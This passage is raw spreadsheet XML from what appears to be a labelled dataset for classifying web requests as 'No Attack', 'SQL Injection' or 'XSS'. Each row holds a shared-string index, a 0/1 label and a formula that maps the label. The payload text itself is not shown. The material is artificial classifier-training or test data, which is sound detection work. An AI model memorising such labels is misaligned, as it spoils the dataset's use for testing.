      </c>
      <c r="B19750">
        <v>1</v>
      </c>
      <c r="C19750" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19751" s="1" t="s">
        <v>249</v>
      </c>
      <c r="B19751">
        <v>1</v>
      </c>
      <c r="C19751" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19752" s="1" t="s">
        <v>250</v>
      </c>
      <c r="B19752">
        <v>1</v>
      </c>
      <c r="C19752" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19753" s="1" t="s">
        <v>248</v>
      </c>
      <c r="B19753">
        <v>1</v>
      </c>
      <c r="C19753" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19754" s="1" t="s">
        <v>242</v>
      </c>
      <c r="B19754">
        <v>1</v>
      </c>
      <c r="C19754" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19755" s="1" t="s">
        <v>243</v>
      </c>
      <c r="B19755">
        <v>1</v>
      </c>
      <c r="C19755" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19756" s="1" t="s">
        <v>244</v>
      </c>
      <c r="B19756">
        <v>1</v>
      </c>
      <c r="C19756" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19757" s="1" t="s">
        <v>21344</v>
      </c>
      <c r="B19757">
        <v>0</v>
      </c>
      <c r="C19757" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19758" s="1" t="s">
        <v>21533</v>
      </c>
      <c r="B19758">
        <v>0</v>
      </c>
      <c r="C19758" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19759" s="1" t="s">
        <v>24668</v>
      </c>
      <c r="B19759">
        <v>1</v>
      </c>
      <c r="C19759" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19760" s="1" t="s">
        <v>34567</v>
      </c>
      <c r="B19760">
        <v>0</v>
      </c>
      <c r="C19760" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19761" s="1" t="s">
        <v>21186</v>
      </c>
      <c r="B19761">
        <v>0</v>
      </c>
      <c r="C19761" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19762" s="1" t="s">
        <v>12022</v>
      </c>
      <c r="B19762">
        <v>1</v>
      </c>
      <c r="C19762" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19763" s="1" t="s">
        <v>27428</v>
      </c>
      <c r="B19763">
        <v>0</v>
      </c>
      <c r="C19763" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19764" s="1" t="s">
        <v>236</v>
      </c>
      <c r="B19764">
        <v>1</v>
      </c>
      <c r="C19764" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19765" s="1" t="s">
        <v>237</v>
      </c>
      <c r="B19765">
        <v>1</v>
      </c>
      <c r="C19765" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19766" s="1" t="s">
        <v>18227</v>
      </c>
      <c r="B19766">
        <v>1</v>
      </c>
      <c r="C19766" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19767" s="1" t="s">
        <v>20837</v>
      </c>
      <c r="B19767">
        <v>0</v>
      </c>
      <c r="C19767" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19768" s="1" t="s">
        <v>7951</v>
      </c>
      <c r="B19768">
        <v>0</v>
      </c>
      <c r="C19768" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19769" s="1" t="s">
        <v>9274</v>
      </c>
      <c r="B19769">
        <v>0</v>
      </c>
      <c r="C19769" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19770" s="1" t="s">
        <v>9111</v>
      </c>
      <c r="B19770">
        <v>0</v>
      </c>
      <c r="C19770" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19771" s="1" t="s">
        <v>7876</v>
      </c>
      <c r="B19771">
        <v>0</v>
      </c>
      <c r="C19771" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19772" s="1" t="s">
        <v>7505</v>
      </c>
      <c r="B19772">
        <v>0</v>
      </c>
      <c r="C19772" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19773" s="1" t="s">
        <v>13196</v>
      </c>
      <c r="B19773">
        <v>1</v>
      </c>
      <c r="C19773" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19774" s="1" t="s">
        <v>23727</v>
      </c>
      <c r="B19774">
        <v>0</v>
      </c>
      <c r="C19774" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19775" s="1" t="s">
        <v>13103</v>
      </c>
      <c r="B19775">
        <v>1</v>
      </c>
      <c r="C19775" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19776" s="1" t="s">
        <v>22182</v>
      </c>
      <c r="B19776">
        <v>0</v>
      </c>
      <c r="C19776" s="7" t="str">
        <f t="shared" si="308"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19777" s="1" t="s">
        <v>26405</v>
      </c>
      <c r="B19777">
        <v>1</v>
      </c>
      <c r="C19777" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19778" s="1" t="s">
        <v>14665</v>
      </c>
      <c r="B19778">
        <v>1</v>
      </c>
      <c r="C19778" s="7" t="str">
        <f t="shared" si="308"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19779" s="1" t="s">
        <v>17477</v>
      </c>
      <c r="B19779">
        <v>1</v>
      </c>
      <c r="C19779" s="7" t="str">
        <f t="shared" ref="C19779:C19842" si="309">IF(B19779=0,"No Attack", IF(B19779=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19780" s="1" t="s">
        <v>23814</v>
      </c>
      <c r="B19780">
        <v>0</v>
      </c>
      <c r="C19780" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19781" s="1" t="s">
        <v>17999</v>
      </c>
      <c r="B19781">
        <v>1</v>
      </c>
      <c r="C19781" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19782" s="1" t="s">
        <v>26560</v>
      </c>
      <c r="B19782">
        <v>1</v>
      </c>
      <c r="C19782" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19783" s="1" t="s">
        <v>30280</v>
      </c>
      <c r="B19783">
        <v>0</v>
      </c>
      <c r="C19783" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19784" s="1" t="s">
        <v>19553</v>
      </c>
      <c r="B19784">
        <v>1</v>
      </c>
      <c r="C19784" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19785" s="1" t="s">
        <v>17366</v>
      </c>
      <c r="B19785">
        <v>1</v>
      </c>
      <c r="C19785" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19786" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19786" s="1" t="s">
        <v>15394</v>
      </c>
      <c r="B19786">
        <v>1</v>
      </c>
      <c r="C19786" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19787" s="1" t="s">
        <v>16176</v>
      </c>
      <c r="B19787">
        <v>1</v>
      </c>
      <c r="C19787" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19788" s="1" t="s">
        <v>24405</v>
      </c>
      <c r="B19788">
        <v>1</v>
      </c>
      <c r="C19788" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19789" s="1" t="s">
        <v>12091</v>
      </c>
      <c r="B19789">
        <v>1</v>
      </c>
      <c r="C19789" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19790" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19790" s="1" t="s">
        <v>24754</v>
      </c>
      <c r="B19790">
        <v>1</v>
      </c>
      <c r="C19790" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19791" s="1" t="s">
        <v>19030</v>
      </c>
      <c r="B19791">
        <v>1</v>
      </c>
      <c r="C19791" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19792" s="1" t="s">
        <v>13808</v>
      </c>
      <c r="B19792">
        <v>1</v>
      </c>
      <c r="C19792" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19793" s="1" t="s">
        <v>17652</v>
      </c>
      <c r="B19793">
        <v>1</v>
      </c>
      <c r="C19793" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19794" s="1" t="s">
        <v>18284</v>
      </c>
      <c r="B19794">
        <v>1</v>
      </c>
      <c r="C19794" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19795" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19795" s="1" t="s">
        <v>14352</v>
      </c>
      <c r="B19795">
        <v>1</v>
      </c>
      <c r="C19795" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19796" s="1" t="s">
        <v>32489</v>
      </c>
      <c r="B19796">
        <v>0</v>
      </c>
      <c r="C19796" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19797" s="1" t="s">
        <v>25502</v>
      </c>
      <c r="B19797">
        <v>1</v>
      </c>
      <c r="C19797" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19798" s="1" t="s">
        <v>17302</v>
      </c>
      <c r="B19798">
        <v>1</v>
      </c>
      <c r="C19798" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19799" s="1" t="s">
        <v>35832</v>
      </c>
      <c r="B19799">
        <v>0</v>
      </c>
      <c r="C19799" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19800" s="1" t="s">
        <v>32885</v>
      </c>
      <c r="B19800">
        <v>0</v>
      </c>
      <c r="C19800" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19801" s="1" t="s">
        <v>14501</v>
      </c>
      <c r="B19801">
        <v>1</v>
      </c>
      <c r="C19801" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19802" s="1" t="s">
        <v>18375</v>
      </c>
      <c r="B19802">
        <v>1</v>
      </c>
      <c r="C19802" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19803" s="1" t="s">
        <v>19894</v>
      </c>
      <c r="B19803">
        <v>1</v>
      </c>
      <c r="C19803" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19804" s="1" t="s">
        <v>36946</v>
      </c>
      <c r="B19804">
        <v>0</v>
      </c>
      <c r="C19804" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19805" s="1" t="s">
        <v>26893</v>
      </c>
      <c r="B19805">
        <v>0</v>
      </c>
      <c r="C19805" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19806" s="1" t="s">
        <v>17794</v>
      </c>
      <c r="B19806">
        <v>1</v>
      </c>
      <c r="C19806" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19807" s="1" t="s">
        <v>12891</v>
      </c>
      <c r="B19807">
        <v>1</v>
      </c>
      <c r="C19807" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19808" s="1" t="s">
        <v>34901</v>
      </c>
      <c r="B19808">
        <v>0</v>
      </c>
      <c r="C19808" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19809" s="1" t="s">
        <v>35100</v>
      </c>
      <c r="B19809">
        <v>0</v>
      </c>
      <c r="C19809" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19810" s="1" t="s">
        <v>20588</v>
      </c>
      <c r="B19810">
        <v>0</v>
      </c>
      <c r="C19810" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19811" s="1" t="s">
        <v>35245</v>
      </c>
      <c r="B19811">
        <v>0</v>
      </c>
      <c r="C19811" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19812" s="1" t="s">
        <v>35088</v>
      </c>
      <c r="B19812">
        <v>0</v>
      </c>
      <c r="C19812" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19813" s="1" t="s">
        <v>19005</v>
      </c>
      <c r="B19813">
        <v>1</v>
      </c>
      <c r="C19813" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19814" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19814" s="1" t="s">
        <v>26363</v>
      </c>
      <c r="B19814">
        <v>1</v>
      </c>
      <c r="C19814" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19815" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19815" s="1" t="s">
        <v>12900</v>
      </c>
      <c r="B19815">
        <v>1</v>
      </c>
      <c r="C19815" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19816" s="1" t="s">
        <v>35996</v>
      </c>
      <c r="B19816">
        <v>0</v>
      </c>
      <c r="C19816" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19817" s="1" t="s">
        <v>19165</v>
      </c>
      <c r="B19817">
        <v>1</v>
      </c>
      <c r="C19817" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19818" s="1" t="s">
        <v>16697</v>
      </c>
      <c r="B19818">
        <v>1</v>
      </c>
      <c r="C19818" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19819" s="1" t="s">
        <v>16159</v>
      </c>
      <c r="B19819">
        <v>1</v>
      </c>
      <c r="C19819" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19820" s="1" t="s">
        <v>17336</v>
      </c>
      <c r="B19820">
        <v>1</v>
      </c>
      <c r="C19820" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19821" s="1" t="s">
        <v>24313</v>
      </c>
      <c r="B19821">
        <v>0</v>
      </c>
      <c r="C19821" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19822" s="1" t="s">
        <v>19958</v>
      </c>
      <c r="B19822">
        <v>1</v>
      </c>
      <c r="C19822" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19823" s="1" t="s">
        <v>26513</v>
      </c>
      <c r="B19823">
        <v>1</v>
      </c>
      <c r="C19823" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19824" s="1" t="s">
        <v>35721</v>
      </c>
      <c r="B19824">
        <v>0</v>
      </c>
      <c r="C19824" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19825" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19825" s="1" t="s">
        <v>18045</v>
      </c>
      <c r="B19825">
        <v>1</v>
      </c>
      <c r="C19825" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19826" s="1" t="s">
        <v>31096</v>
      </c>
      <c r="B19826">
        <v>0</v>
      </c>
      <c r="C19826" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19827" s="1" t="s">
        <v>12180</v>
      </c>
      <c r="B19827">
        <v>1</v>
      </c>
      <c r="C19827" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19828" s="1" t="s">
        <v>27821</v>
      </c>
      <c r="B19828">
        <v>0</v>
      </c>
      <c r="C19828" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19829" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19829" s="1" t="s">
        <v>24828</v>
      </c>
      <c r="B19829">
        <v>1</v>
      </c>
      <c r="C19829" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19830" s="1" t="s">
        <v>32091</v>
      </c>
      <c r="B19830">
        <v>0</v>
      </c>
      <c r="C19830" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19831" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19831" s="1" t="s">
        <v>18858</v>
      </c>
      <c r="B19831">
        <v>1</v>
      </c>
      <c r="C19831" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19832" s="1" t="s">
        <v>30842</v>
      </c>
      <c r="B19832">
        <v>0</v>
      </c>
      <c r="C19832" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19833" s="1" t="s">
        <v>20586</v>
      </c>
      <c r="B19833">
        <v>0</v>
      </c>
      <c r="C19833" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19834" s="1" t="s">
        <v>17226</v>
      </c>
      <c r="B19834">
        <v>1</v>
      </c>
      <c r="C19834" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19835" s="1" t="s">
        <v>31415</v>
      </c>
      <c r="B19835">
        <v>0</v>
      </c>
      <c r="C19835" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19836" s="1" t="s">
        <v>23445</v>
      </c>
      <c r="B19836">
        <v>0</v>
      </c>
      <c r="C19836" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19837" s="1" t="s">
        <v>24939</v>
      </c>
      <c r="B19837">
        <v>1</v>
      </c>
      <c r="C19837" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19838" s="1" t="s">
        <v>13231</v>
      </c>
      <c r="B19838">
        <v>1</v>
      </c>
      <c r="C19838" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19839" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19839" s="1" t="s">
        <v>25332</v>
      </c>
      <c r="B19839">
        <v>1</v>
      </c>
      <c r="C19839" s="7" t="str">
        <f t="shared" si="309"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19840" s="1" t="s">
        <v>27803</v>
      </c>
      <c r="B19840">
        <v>0</v>
      </c>
      <c r="C19840" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19841" s="1" t="s">
        <v>35431</v>
      </c>
      <c r="B19841">
        <v>0</v>
      </c>
      <c r="C19841" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19842" s="1" t="s">
        <v>23376</v>
      </c>
      <c r="B19842">
        <v>0</v>
      </c>
      <c r="C19842" s="7" t="str">
        <f t="shared" si="309"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19843" s="1" t="s">
        <v>14686</v>
      </c>
      <c r="B19843">
        <v>1</v>
      </c>
      <c r="C19843" s="7" t="str">
        <f t="shared" ref="C19843:C19906" si="310">IF(B19843=0,"No Attack", IF(B19843=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19844" s="1" t="s">
        <v>17224</v>
      </c>
      <c r="B19844">
        <v>1</v>
      </c>
      <c r="C19844" s="7" t="str">
        <f t="shared" si="310"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19845" s="1" t="s">
        <v>13173</v>
      </c>
      <c r="B19845">
        <v>1</v>
      </c>
      <c r="C19845" s="7" t="str">
        <f t="shared" si="310"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19846" s="1" t="s">
        <v>25940</v>
      </c>
      <c r="B19846">
        <v>1</v>
      </c>
      <c r="C19846" s="7" t="str">
        <f t="shared" si="310"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19847" s="1" t="s">
        <v>17928</v>
      </c>
      <c r="B19847">
        <v>1</v>
      </c>
      <c r="C19847" s="7" t="str">
        <f t="shared" si="310"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19848" s="1" t="s">
        <v>13704</v>
      </c>
      <c r="B19848">
        <v>1</v>
      </c>
      <c r="C19848" s="7" t="str">
        <f t="shared" si="310"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19849" s="1" t="s">
        <v>36406</v>
      </c>
      <c r="B19849">
        <v>0</v>
      </c>
      <c r="C19849" s="7" t="str">
        <f t="shared" si="310"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19850" s="1" t="s">
        <v>15194</v>
      </c>
      <c r="B19850">
        <v>1</v>
      </c>
      <c r="C19850" s="7" t="str">
        <f t="shared" si="310"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19851" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19851" s="1" t="s">
        <v>15783</v>
      </c>
      <c r="B19851">
        <v>1</v>
      </c>
      <c r="C19851" s="7" t="str">
        <f t="shared" si="310"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19852" s="1" t="s">
        <v>31777</v>
      </c>
      <c r="B19852">
        <v>0</v>
      </c>
      <c r="C19852" s="7" t="str">
        <f t="shared" si="310"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19853" spans="1:3" x14ac:dyDescent="0.3">
